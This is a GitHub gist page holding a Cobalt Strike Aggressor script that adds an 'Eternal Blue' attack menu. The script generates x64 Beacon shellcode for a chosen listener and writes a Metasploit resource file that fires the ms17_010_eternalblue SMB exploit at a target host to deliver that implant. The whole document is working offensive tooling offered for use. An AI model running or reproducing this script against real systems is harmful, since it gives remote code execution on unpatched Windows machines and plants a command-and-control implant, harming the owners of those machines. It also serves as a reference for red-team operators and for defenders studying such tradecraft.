Skip to content

Instantly share code, notes, and snippets.

@rsmudge
Last active October 10, 2023 15:05
  • Star 22 You must be signed in to star a gist
  • Fork 3 You must be signed in to fork a gist
Star You must be signed in to star a gist
Save rsmudge/9b54a66744a94f3950cc171254057942 to your computer and use it in GitHub Desktop.
Script to deliver Cobalt Strike's Beacon payload with the Metasploit Framework's exploit/windows/smb/ms17_010_eternalblue exploit.
#
# script to help move around with ms17-010 from Metasploit
# Go to Attacks -> Eternal Blue
#
# target, listener, where to save .rc file
sub generate_rc_file {
local('$target $listener $where $handle $shellcode');
($target, $listener, $where) = @_;
# generate our shellcode
$shellcode = shellcode($listener, true, "x64");
if ($shellcode is $null) {
return "ERROR: There is no x64 shellcode for $listener";
}
# write out our shellcode
$handle = openf("> $+ $where $+ .bin");
writeb($handle, $shellcode);
closef($handle);
# write out our .rc file
$handle = openf("> $+ $where");
println($handle, "use exploit/windows/smb/ms17_010_eternalblue ");
println($handle, "set RHOST $target");
println($handle, "set PAYLOAD generic/custom");
println($handle, "set PAYLOADFILE $where $+ .bin");
println($handle, "set MaxExploitAttempts 1");
println($handle, "exploit -j");
closef($handle);
# tell the user what to do!
return "resource $where";
}
sub generate_rc_file_prompt {
# ask where to save it
prompt_file_save("launch.rc", lambda({
# generate our .rc file
local('$run');
$run = generate_rc_file($args['target'], $args['listener'], $1);
# tell the user about it!
prompt_text("Run this command in Metasploit: ", $run, {});
}, $args => $3));
}
# the dialog, nothing fancy!
sub openEternalBlueDialog {
$dialog = dialog("ms17-010", %(), &generate_rc_file_prompt);
dialog_description($dialog, "Generate a Metasploit Framework .rc file to deliver a Cobalt Strike Beacon with ms17-010. x64 Targets only!");
drow_text($dialog, "target", "Target:");
drow_listener($dialog, "listener", "Listener:");
dbutton_action($dialog, "Generate");
dialog_show($dialog);
}
#
popup attacks {
item "&Eternal Blue" {
openEternalBlueDialog();
}
}
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment